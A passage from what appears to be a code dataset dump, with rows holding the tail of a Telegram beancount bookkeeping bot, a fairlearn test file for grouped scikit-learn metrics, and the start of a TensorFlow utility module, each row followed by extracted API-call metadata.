apihelper.proxy = {'https': proxy}
    # Start polling
bot.infinity_polling()
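# --- Hypothetical entry-point sketch (not part of the original file) ---
# Assuming the configuration has been loaded elsewhere, a standalone script
# could start the bot with:
#   if __name__ == '__main__':
#       serving()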
| [((17, 6, 17, 50), 'telebot.TeleBot', 'telebot.TeleBot', (), '', False, 'import telebot\n'), ((28, 27, 28, 64), 'beancount_bot.session.get_session_for', 'get_session_for', ({(28, 43, 28, 63): 'message.from_user.id'}, {}), '(message.from_user.id)', False, 'from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session\n'), ((50, 11, 50, 62), 'beancount_bot.session.get_session', 'get_session', ({(50, 23, 50, 43): 'message.from_user.id', (50, 45, 50, 54): 'SESS_AUTH', (50, 56, 50, 61): 'False'}, {}), '(message.from_user.id, SESS_AUTH, False)', False, 'from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session\n'), ((67, 17, 67, 45), 'beancount_bot.config.get_config', 'get_config', ({(67, 28, 67, 44): '"""bot.auth_token"""'}, {}), "('bot.auth_token')", False, 'from beancount_bot.config import get_config, load_config\n'), ((90, 4, 90, 17), 'beancount_bot.config.load_config', 'load_config', ({}, {}), '()', False, 'from beancount_bot.config import get_config, load_config\n'), ((91, 4, 91, 15), 'beancount_bot.task.load_task', 'load_task', ({}, {}), '()', False, 'from beancount_bot.task import load_task, get_task\n'), ((173, 12, 173, 22), 'beancount_bot.task.get_task', 'get_task', ({}, {}), '()', False, 'from beancount_bot.task import load_task, get_task\n'), ((206, 14, 206, 27), 'beancount_bot.transaction.get_manager', 'get_manager', ({}, {}), '()', False, 'from beancount_bot.transaction import get_manager\n'), ((229, 11, 229, 59), 'beancount_bot.session.get_session', 'get_session', ({(229, 23, 229, 40): 'call.from_user.id', (229, 42, 229, 51): 'SESS_AUTH', (229, 53, 229, 58): 'False'}, {}), '(call.from_user.id, SESS_AUTH, False)', False, 'from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session\n'), ((234, 14, 234, 27), 'beancount_bot.transaction.get_manager', 'get_manager', ({}, {}), '()', False, 'from beancount_bot.transaction import get_manager\n'), ((259, 12, 259, 35), 'beancount_bot.config.get_config', 'get_config', ({(259, 23, 259, 34): '"""bot.token"""'}, {}), "('bot.token')", False, 'from beancount_bot.config import get_config, load_config\n'), ((262, 12, 262, 35), 'beancount_bot.config.get_config', 'get_config', ({(262, 23, 262, 34): '"""bot.proxy"""'}, {}), "('bot.proxy')", False, 'from beancount_bot.config import get_config, load_config\n'), ((55, 26, 55, 101), 'beancount_bot.i18n._', '_', ({(55, 28, 55, 100): '"""Welcome to the accounting robot!Please enter the authentication token:"""'}, {}), "('Welcome to the accounting robot!Please enter the authentication token:')", False, 'from beancount_bot.i18n import _\n'), ((69, 8, 69, 58), 'beancount_bot.session.set_session', 'set_session', ({(69, 20, 69, 40): 'message.from_user.id', (69, 42, 69, 51): 'SESS_AUTH', (69, 53, 69, 57): '(True)'}, {}), '(message.from_user.id, SESS_AUTH, True)', False, 'from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session\n'), ((92, 26, 92, 67), 'beancount_bot.i18n._', '_', ({(92, 28, 92, 66): '"""Successful overload configuration!"""'}, {}), "('Successful overload configuration!')", False, 'from beancount_bot.i18n import _\n'), ((103, 18, 103, 31), 'beancount_bot.transaction.get_manager', 'get_manager', ({}, {}), '()', False, 'from beancount_bot.transaction import get_manager\n'), ((106, 17, 106, 39), 'telebot.types.InlineKeyboardMarkup', 'InlineKeyboardMarkup', ({}, {}), '()', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, MessageEntity, Message, CallbackQuery\n'), 
((210, 17, 210, 39), 'telebot.types.InlineKeyboardMarkup', 'InlineKeyboardMarkup', ({}, {}), '()', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, MessageEntity, Message, CallbackQuery\n'), ((238, 18, 238, 53), 'beancount_bot.i18n._', '_', ({(238, 20, 238, 52): '"""Transaction has been withdrawn"""'}, {}), "('Transaction has been withdrawn')", False, 'from beancount_bot.i18n import _\n'), ((52, 30, 52, 61), 'beancount_bot.i18n._', '_', ({(52, 32, 52, 60): '"""Have been authenticated!"""'}, {}), "('Have been authenticated!')", False, 'from beancount_bot.i18n import _\n'), ((70, 30, 70, 55), 'beancount_bot.i18n._', '_', ({(70, 32, 70, 54): '"""Authentic success!"""'}, {}), "('Authentic success!')", False, 'from beancount_bot.i18n import _\n'), ((72, 30, 72, 64), 'beancount_bot.i18n._', '_', ({(72, 32, 72, 63): '"""Authentication token error!"""'}, {}), "('Authentication token error!')", False, 'from beancount_bot.i18n import _\n'), ((88, 30, 88, 73), 'beancount_bot.i18n._', '_', ({(88, 32, 88, 72): '"""Please conduct authentication first!"""'}, {}), "('Please conduct authentication first!')", False, 'from beancount_bot.i18n import _\n'), ((112, 12, 112, 40), 'beancount_bot.i18n._', '_', ({(112, 14, 112, 39): '"""/start - Authentication"""'}, {}), "('/start - Authentication')", False, 'from beancount_bot.i18n import _\n'), ((113, 12, 113, 35), 'beancount_bot.i18n._', '_', ({(113, 14, 113, 34): '"""/help - Using help"""'}, {}), "('/help - Using help')", False, 'from beancount_bot.i18n import _\n'), ((114, 12, 114, 56), 'beancount_bot.i18n._', '_', ({(114, 14, 114, 55): '"""/reload - Reload the configuration file"""'}, {}), "('/reload - Reload the configuration file')", False, 'from beancount_bot.i18n import _\n'), ((115, 12, 115, 43), 'beancount_bot.i18n._', '_', ({(115, 14, 115, 42): '"""/task - View, run the task"""'}, {}), "('/task - View, run the task')", False, 'from beancount_bot.i18n import _\n'), ((140, 12, 140, 41), 'beancount_bot.i18n._', '_', ({(140, 14, 140, 40): '"""help:{name}\n\n{usage}"""'}, {}), '("""help:{name}\n\n{usage}""")', False, 'from beancount_bot.i18n import _\n'), ((153, 22, 153, 35), 'beancount_bot.transaction.get_manager', 'get_manager', ({}, {}), '()', False, 'from beancount_bot.transaction import get_manager\n'), ((156, 8, 156, 56), 'beancount_bot.util.logger.error', 'logger.error', ({(156, 21, 156, 52): 'f"""{call.id}:Unknown error!"""', (156, 54, 156, 55): 'e'}, {}), "(f'{call.id}:Unknown error!', e)", False, 'from beancount_bot.util import logger\n'), ((169, 30, 169, 71), 'beancount_bot.i18n._', '_', ({(169, 32, 169, 70): '"""Please conduct authentication first!"""'}, {}), "('Please conduct authentication first!')", False, 'from beancount_bot.i18n import _\n'), ((213, 30, 213, 54), 'beancount_bot.transaction.stringfy', 'transaction.stringfy', ({(213, 51, 213, 53): 'tx'}, {}), '(tx)', False, 'from beancount_bot import transaction\n'), ((215, 8, 215, 78), 'beancount_bot.util.logger.info', 'logger.info', ({(215, 20, 215, 74): 'f"""{message.from_user.id}:Unable to add transactions"""', (215, 76, 215, 77): 'e'}, {}), "(f'{message.from_user.id}:Unable to add transactions', e)", False, 'from beancount_bot.util import logger\n'), ((218, 8, 218, 100), 'beancount_bot.util.logger.error', 'logger.error', ({(218, 21, 218, 96): 'f"""{message.from_user.id}:An unknown mistake!Adding a transaction failed."""', (218, 98, 218, 99): 'e'}, {}), "(\n f'{message.from_user.id}:An unknown mistake!Adding a transaction failed.',\n e)", False, 'from 
beancount_bot.util import logger\n'), ((231, 43, 231, 86), 'beancount_bot.i18n._', '_', ({(231, 45, 231, 85): '"""Please conduct authentication first!"""'}, {}), "('Please conduct authentication first!')", False, 'from beancount_bot.i18n import _\n'), ((245, 8, 245, 63), 'beancount_bot.util.logger.info', 'logger.info', ({(245, 20, 245, 59): 'f"""{call.id}:Unable to create trading"""', (245, 61, 245, 62): 'e'}, {}), "(f'{call.id}:Unable to create trading', e)", False, 'from beancount_bot.util import logger\n'), ((248, 8, 248, 96), 'beancount_bot.util.logger.error', 'logger.error', ({(248, 21, 248, 92): 'f"""{call.id}:An unknown mistake!Withdrawal of the transaction failed."""', (248, 94, 248, 95): 'e'}, {}), "(\n f'{call.id}:An unknown mistake!Withdrawal of the transaction failed.', e)", False, 'from beancount_bot.util import logger\n'), ((109, 23, 109, 82), 'telebot.types.InlineKeyboardButton', 'InlineKeyboardButton', (), '', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, MessageEntity, Message, CallbackQuery\n'), ((118, 12, 118, 174), 'beancount_bot.i18n._', '_', ({(118, 14, 118, 173): '"""Account bill Bot\n\nAvailable instruction list:\n{command}\n\nTrade statement syntax help, select the corresponding module,Use /help [Module name] Check."""'}, {}), '("""Account bill Bot\n\nAvailable instruction list:\n{command}\n\nTrade statement syntax help, select the corresponding module,Use /help [Module name] Check."""\n )', False, 'from beancount_bot.i18n import _\n'), ((130, 34, 130, 118), 'beancount_bot.i18n._', '_', ({(130, 36, 130, 117): '"""The corresponding name of the transaction statement processor does not exist!"""'}, {}), "('The corresponding name of the transaction statement processor does not exist!'\n )", False, 'from beancount_bot.i18n import _\n'), ((157, 21, 157, 43), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n'), ((184, 34, 184, 61), 'beancount_bot.i18n._', '_', ({(184, 36, 184, 60): '"""Task does not exist!"""'}, {}), "('Task does not exist!')", False, 'from beancount_bot.i18n import _\n'), ((211, 40, 211, 59), 'beancount_bot.i18n._', '_', ({(211, 42, 211, 58): '"""Revoke trading"""'}, {}), "('Revoke trading')", False, 'from beancount_bot.i18n import _\n'), ((249, 43, 249, 104), 'beancount_bot.i18n._', '_', ({(249, 45, 249, 103): '"""An unknown mistake!Withdrawal of the transaction failed."""'}, {}), "('An unknown mistake!Withdrawal of the transaction failed.')", False, 'from beancount_bot.i18n import _\n'), ((108, 23, 108, 41), 'beancount_bot.i18n._', '_', ({(108, 25, 108, 40): '"""help:{name}"""'}, {}), "('help:{name}')", False, 'from beancount_bot.i18n import _\n'), ((178, 21, 179, 71), 'beancount_bot.i18n._', '_', ({(178, 23, 179, 70): '"""Current registration task:{all_tasks}\nable to pass /task [Task Name] Active trigger"""'}, {}), '("""Current registration task:{all_tasks}\nable to pass /task [Task Name] Active trigger"""\n )', False, 'from beancount_bot.i18n import _\n'), ((158, 66, 158, 88), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n'), ((219, 84, 219, 106), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n')] |
GeGao2014/fairlearn | test/unit/metrics/test_group_sklearn_wrappers.py | b0841c8b07ead6a285bdbc0ea61cac2338cbc96e | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import pytest
import numpy as np
import sklearn.metrics as skm
import fairlearn.metrics as metrics
# ======================================================
a = "a"
b = "b"
c = "c"
Y_true = [0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
Y_pred = [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
Y_true_ternary = [a, b, c, c, c, b, b, b, c, c, a, a, a, a, a, b, c, c]
Y_pred_ternary = [b, c, c, c, b, b, b, b, b, c, a, a, c, a, a, b, c, c]
groups = [3, 4, 1, 0, 0, 0, 3, 2, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4]
weight = [1, 2, 3, 1, 2, 3, 4, 2, 3, 3, 2, 1, 2, 3, 1, 2, 3, 4]
group2 = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
# =======================================================
# Define as lists of (sklearn metric, group metric) pairs so that the actual
# names can be seen when pytest builds the tests
supported_metrics_weighted = [(skm.accuracy_score, metrics.group_accuracy_score),
(skm.confusion_matrix, metrics.group_confusion_matrix),
(skm.zero_one_loss, metrics.group_zero_one_loss)]
# The following only work with binary data when called with their default arguments
supported_metrics_weighted_binary = [(skm.precision_score, metrics.group_precision_score),
(skm.recall_score, metrics.group_recall_score),
(skm.roc_auc_score, metrics.group_roc_auc_score),
(skm.mean_squared_error, metrics.group_mean_squared_error),
(skm.r2_score, metrics.group_r2_score)]
supported_metrics_weighted_binary = supported_metrics_weighted_binary + supported_metrics_weighted
metrics_no_sample_weights = [(skm.max_error, metrics.group_max_error),
(skm.mean_absolute_error, metrics.group_mean_absolute_error),
(skm.mean_squared_log_error, metrics.group_mean_squared_log_error),
(skm.median_absolute_error, metrics.group_median_absolute_error)]
supported_metrics_unweighted = metrics_no_sample_weights + supported_metrics_weighted_binary
# =======================================================
@pytest.mark.parametrize("func_tuple", supported_metrics_unweighted)
def test_metric_unweighted(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true, Y_pred, groups)
# We don't really care about the numbers (sklearn is responsible)
# We just want to make sure we got a result
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true, Y_pred)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
@pytest.mark.parametrize("func_tuple", supported_metrics_weighted_binary)
def test_metric_weighted(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true, Y_pred, groups, sample_weight=weight)
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true, Y_pred, sample_weight=weight)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
@pytest.mark.parametrize("func_tuple", supported_metrics_weighted)
def test_metric_weighted_ternary(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true_ternary, Y_pred_ternary, groups, sample_weight=weight)
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true_ternary, Y_pred_ternary, sample_weight=weight)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
# ======================================================================================
def test_group_accuracy_score_unnormalized():
result = metrics.group_accuracy_score(Y_true, Y_pred, groups, normalize=False)
expected_overall = skm.accuracy_score(Y_true, Y_pred, False)
assert result.overall == expected_overall
# ======================================================================================
def test_group_confusion_matrix_labels():
labels = [0, 4]
result = metrics.group_confusion_matrix(Y_true, Y_pred, groups, labels=labels)
expected_overall = skm.confusion_matrix(Y_true, Y_pred, labels=labels)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_precision_score_ternary():
result = metrics.group_precision_score(Y_true_ternary, Y_pred_ternary, group2, average=None)
expected_overall = skm.precision_score(Y_true_ternary, Y_pred_ternary, average=None)
assert np.array_equal(result.overall, expected_overall)
def test_group_precision_score_pos_label():
result = metrics.group_precision_score(Y_true, Y_pred, groups, pos_label=0)
expected_overall = skm.precision_score(Y_true, Y_pred, pos_label=0)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_recall_score_ternary():
result = metrics.group_recall_score(Y_true_ternary, Y_pred_ternary, group2, average=None)
expected_overall = skm.recall_score(Y_true_ternary, Y_pred_ternary, average=None)
assert np.array_equal(result.overall, expected_overall)
def test_group_recall_score_pos_label():
result = metrics.group_recall_score(Y_true, Y_pred, groups, pos_label=0)
expected_overall = skm.recall_score(Y_true, Y_pred, pos_label=0)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_roc_auc_score_average():
result = metrics.group_roc_auc_score(Y_true, Y_pred, groups, average='samples')
expected_overall = skm.roc_auc_score(Y_true, Y_pred, average='samples')
assert expected_overall == result.overall
def test_group_roc_auc_score_max_fpr():
result = metrics.group_roc_auc_score(Y_true, Y_pred, groups, max_fpr=0.5)
expected_overall = skm.roc_auc_score(Y_true, Y_pred, max_fpr=0.5)
assert expected_overall == result.overall
# ======================================================================================
def test_group_zero_one_loss_unnormalized():
result = metrics.group_zero_one_loss(Y_true, Y_pred, groups, normalize=False)
expected_overall = skm.zero_one_loss(Y_true, Y_pred, False)
assert result.overall == expected_overall
# =============================================================================================
def test_group_mean_squared_error_multioutput_single_ndarray():
y_t = np.random.rand(len(groups), 2)
y_p = np.random.rand(len(groups), 2)
result = metrics.group_mean_squared_error(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.mean_squared_error(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
# =============================================================================================
def test_group_r2_score_multioutput():
y_t = np.random.rand(len(groups), 2)
y_p = np.random.rand(len(groups), 2)
result = metrics.group_r2_score(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.r2_score(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
for target_group in np.unique(groups):
mask = np.asarray(groups) == target_group
expected = skm.r2_score(y_t[mask], y_p[mask], multioutput='raw_values')
assert np.array_equal(result.by_group[target_group], expected)
# =============================================================================================
def test_group_mean_squared_error_multioutput_list_ndarray():
y_t = [np.random.rand(2) for x in groups]
y_p = [np.random.rand(2) for x in groups]
result = metrics.group_mean_squared_error(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.mean_squared_error(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
for target_group in np.unique(groups):
y_true = []
y_pred = []
for i in range(len(groups)):
if groups[i] == target_group:
y_true.append(y_t[i])
y_pred.append(y_p[i])
expected = skm.mean_squared_error(y_true, y_pred, multioutput='raw_values')
assert np.array_equal(result.by_group[target_group], expected)
| [((54, 1, 54, 68), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(54, 25, 54, 37): '"""func_tuple"""', (54, 39, 54, 67): 'supported_metrics_unweighted'}, {}), "('func_tuple', supported_metrics_unweighted)", False, 'import pytest\n'), ((71, 1, 71, 73), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(71, 25, 71, 37): '"""func_tuple"""', (71, 39, 71, 72): 'supported_metrics_weighted_binary'}, {}), "('func_tuple', supported_metrics_weighted_binary)", False, 'import pytest\n'), ((86, 1, 86, 66), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(86, 25, 86, 37): '"""func_tuple"""', (86, 39, 86, 65): 'supported_metrics_weighted'}, {}), "('func_tuple', supported_metrics_weighted)", False, 'import pytest\n'), ((104, 13, 104, 82), 'fairlearn.metrics.group_accuracy_score', 'metrics.group_accuracy_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((106, 23, 106, 64), 'sklearn.metrics.accuracy_score', 'skm.accuracy_score', ({(106, 42, 106, 48): 'Y_true', (106, 50, 106, 56): 'Y_pred', (106, 58, 106, 63): 'False'}, {}), '(Y_true, Y_pred, False)', True, 'import sklearn.metrics as skm\n'), ((116, 13, 116, 82), 'fairlearn.metrics.group_confusion_matrix', 'metrics.group_confusion_matrix', (), '', True, 'import fairlearn.metrics as metrics\n'), ((117, 23, 117, 74), 'sklearn.metrics.confusion_matrix', 'skm.confusion_matrix', (), '', True, 'import sklearn.metrics as skm\n'), ((119, 11, 119, 59), 'numpy.array_equal', 'np.array_equal', ({(119, 26, 119, 40): 'result.overall', (119, 42, 119, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((125, 13, 125, 96), 'fairlearn.metrics.group_precision_score', 'metrics.group_precision_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((126, 23, 126, 88), 'sklearn.metrics.precision_score', 'skm.precision_score', (), '', True, 'import sklearn.metrics as skm\n'), ((128, 11, 128, 59), 'numpy.array_equal', 'np.array_equal', ({(128, 26, 128, 40): 'result.overall', (128, 42, 128, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((132, 13, 132, 79), 'fairlearn.metrics.group_precision_score', 'metrics.group_precision_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((133, 23, 133, 71), 'sklearn.metrics.precision_score', 'skm.precision_score', (), '', True, 'import sklearn.metrics as skm\n'), ((135, 11, 135, 59), 'numpy.array_equal', 'np.array_equal', ({(135, 26, 135, 40): 'result.overall', (135, 42, 135, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((141, 13, 141, 93), 'fairlearn.metrics.group_recall_score', 'metrics.group_recall_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((142, 23, 142, 85), 'sklearn.metrics.recall_score', 'skm.recall_score', (), '', True, 'import sklearn.metrics as skm\n'), ((144, 11, 144, 59), 'numpy.array_equal', 'np.array_equal', ({(144, 26, 144, 40): 'result.overall', (144, 42, 144, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((148, 13, 148, 76), 'fairlearn.metrics.group_recall_score', 'metrics.group_recall_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((149, 23, 149, 68), 'sklearn.metrics.recall_score', 'skm.recall_score', (), '', True, 'import sklearn.metrics as skm\n'), ((151, 11, 151, 59), 'numpy.array_equal', 'np.array_equal', ({(151, 26, 151, 40): 'result.overall', (151, 42, 151, 58): 'expected_overall'}, {}), '(result.overall, 
expected_overall)', True, 'import numpy as np\n'), ((157, 13, 157, 83), 'fairlearn.metrics.group_roc_auc_score', 'metrics.group_roc_auc_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((158, 23, 158, 75), 'sklearn.metrics.roc_auc_score', 'skm.roc_auc_score', (), '', True, 'import sklearn.metrics as skm\n'), ((164, 13, 164, 77), 'fairlearn.metrics.group_roc_auc_score', 'metrics.group_roc_auc_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((165, 23, 165, 69), 'sklearn.metrics.roc_auc_score', 'skm.roc_auc_score', (), '', True, 'import sklearn.metrics as skm\n'), ((173, 13, 173, 81), 'fairlearn.metrics.group_zero_one_loss', 'metrics.group_zero_one_loss', (), '', True, 'import fairlearn.metrics as metrics\n'), ((175, 23, 175, 63), 'sklearn.metrics.zero_one_loss', 'skm.zero_one_loss', ({(175, 41, 175, 47): 'Y_true', (175, 49, 175, 55): 'Y_pred', (175, 57, 175, 62): 'False'}, {}), '(Y_true, Y_pred, False)', True, 'import sklearn.metrics as skm\n'), ((185, 13, 185, 89), 'fairlearn.metrics.group_mean_squared_error', 'metrics.group_mean_squared_error', (), '', True, 'import fairlearn.metrics as metrics\n'), ((187, 23, 187, 81), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (), '', True, 'import sklearn.metrics as skm\n'), ((189, 11, 189, 59), 'numpy.array_equal', 'np.array_equal', ({(189, 26, 189, 40): 'result.overall', (189, 42, 189, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((197, 13, 197, 79), 'fairlearn.metrics.group_r2_score', 'metrics.group_r2_score', (), '', True, 'import fairlearn.metrics as metrics\n'), ((199, 23, 199, 71), 'sklearn.metrics.r2_score', 'skm.r2_score', (), '', True, 'import sklearn.metrics as skm\n'), ((201, 11, 201, 59), 'numpy.array_equal', 'np.array_equal', ({(201, 26, 201, 40): 'result.overall', (201, 42, 201, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((202, 24, 202, 41), 'numpy.unique', 'np.unique', ({(202, 34, 202, 40): 'groups'}, {}), '(groups)', True, 'import numpy as np\n'), ((213, 13, 213, 89), 'fairlearn.metrics.group_mean_squared_error', 'metrics.group_mean_squared_error', (), '', True, 'import fairlearn.metrics as metrics\n'), ((215, 23, 215, 81), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (), '', True, 'import sklearn.metrics as skm\n'), ((217, 11, 217, 59), 'numpy.array_equal', 'np.array_equal', ({(217, 26, 217, 40): 'result.overall', (217, 42, 217, 58): 'expected_overall'}, {}), '(result.overall, expected_overall)', True, 'import numpy as np\n'), ((219, 24, 219, 41), 'numpy.unique', 'np.unique', ({(219, 34, 219, 40): 'groups'}, {}), '(groups)', True, 'import numpy as np\n'), ((66, 15, 66, 63), 'numpy.array_equal', 'np.array_equal', ({(66, 30, 66, 46): 'expected_overall', (66, 48, 66, 62): 'result.overall'}, {}), '(expected_overall, result.overall)', True, 'import numpy as np\n'), ((81, 15, 81, 63), 'numpy.array_equal', 'np.array_equal', ({(81, 30, 81, 46): 'expected_overall', (81, 48, 81, 62): 'result.overall'}, {}), '(expected_overall, result.overall)', True, 'import numpy as np\n'), ((96, 15, 96, 63), 'numpy.array_equal', 'np.array_equal', ({(96, 30, 96, 46): 'expected_overall', (96, 48, 96, 62): 'result.overall'}, {}), '(expected_overall, result.overall)', True, 'import numpy as np\n'), ((204, 19, 204, 79), 'sklearn.metrics.r2_score', 'skm.r2_score', (), '', True, 'import sklearn.metrics as skm\n'), ((205, 15, 205, 70), 'numpy.array_equal', 'np.array_equal', ({(205, 30, 
205, 59): 'result.by_group[target_group]', (205, 61, 205, 69): 'expected'}, {}), '(result.by_group[target_group], expected)', True, 'import numpy as np\n'), ((211, 11, 211, 28), 'numpy.random.rand', 'np.random.rand', ({(211, 26, 211, 27): '(2)'}, {}), '(2)', True, 'import numpy as np\n'), ((212, 11, 212, 28), 'numpy.random.rand', 'np.random.rand', ({(212, 26, 212, 27): '(2)'}, {}), '(2)', True, 'import numpy as np\n'), ((226, 19, 226, 83), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (), '', True, 'import sklearn.metrics as skm\n'), ((227, 15, 227, 70), 'numpy.array_equal', 'np.array_equal', ({(227, 30, 227, 59): 'result.by_group[target_group]', (227, 61, 227, 69): 'expected'}, {}), '(result.by_group[target_group], expected)', True, 'import numpy as np\n'), ((203, 15, 203, 33), 'numpy.asarray', 'np.asarray', ({(203, 26, 203, 32): 'groups'}, {}), '(groups)', True, 'import numpy as np\n')] |
cbschaff/nlimb | deeplearning/tf_util.py | f0564b00bab1b3367aaa88163e49bebc88f349bb | """
Adapted from OpenAI Baselines.
"""
import numpy as np
import tensorflow as tf # pylint: ignore-module
import random
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
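# Descriptive note (not in the original): the expression above is the piecewise Huber loss
#   L(x) = 0.5 * x**2                   if |x| <  delta
#   L(x) = delta * (|x| - 0.5 * delta)  if |x| >= delta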
# ================================================================
# Global session
# ================================================================
def make_session(num_cpu=None, make_default=False):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
tf_config.gpu_options.allocator_type = 'BFC'
if make_default:
return tf.InteractiveSession(config=tf_config)
else:
return tf.Session(config=tf_config)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
tf.get_default_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
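# --- Hypothetical usage sketch (not part of the original file) ---
# Typical TF1-style setup with the helpers above:
#   sess = make_session(num_cpu=1, make_default=True)   # or single_threaded_session()
#   initialize()                                         # runs initializers for new variables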
# ================================================================
# Saving variables and setting up experiment directories
# ================================================================
def load_state(fname):
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname):
os.makedirs(os.path.dirname(fname), exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
def load(fname):
import cloudpickle
with open(fname, 'rb') as f:
return cloudpickle.load(f)
def save(fname, obj):
import cloudpickle
os.makedirs(os.path.dirname(fname), exist_ok=True)
with open(fname, 'wb') as fh:
cloudpickle.dump(obj, fh)
class Experiment(object):
def __init__(self, logdir):
self.logdir = logdir
os.makedirs(os.path.join(logdir, 'checkpoints'), exist_ok=True)
def load(self, timestep=None):
if timestep is None:
# get latest ckpt
import glob
fs = glob.glob(os.path.join(self.logdir, 'checkpoints/*'))
timesteps = []
for f in fs:
try: timesteps.append(int(os.path.basename(f)))
except: pass
if len(timesteps) == 0:
return 0
timestep = max(timesteps)
fname = os.path.join(self.logdir, 'checkpoints', str(timestep), 'model')
load_state(fname)
return timestep
def save(self, timestep):
fname = os.path.join(self.logdir, 'checkpoints', str(timestep), 'model')
save_state(fname)
def load_model_fn(self):
fname = os.path.join(self.logdir, 'checkpoints/model_fn.pkl')
assert os.path.exists(fname), "No model file saved."
return load(fname)
def save_model_fn(self, model_fn):
fname = os.path.join(self.logdir, 'checkpoints/model_fn.pkl')
save(fname, model_fn)
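# --- Hypothetical usage sketch (not part of the original file); the log directory is illustrative ---
#   exp = Experiment('/tmp/my_run')
#   start_step = exp.load()            # 0 if no checkpoint exists yet
#   exp.save(start_step + 1000)        # writes <logdir>/checkpoints/<timestep>/model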
# ================================================================
# Model components
# ================================================================
def batch_to_seq(h, nbatch, nsteps, flat=False):
"""
Assumes Time major data!!
x.shape = [nsteps, nbatch, *obs_shape]
    h = x.reshape([-1, *x.shape[2:]])
"""
if flat:
h = tf.reshape(h, [nsteps, nbatch])
else:
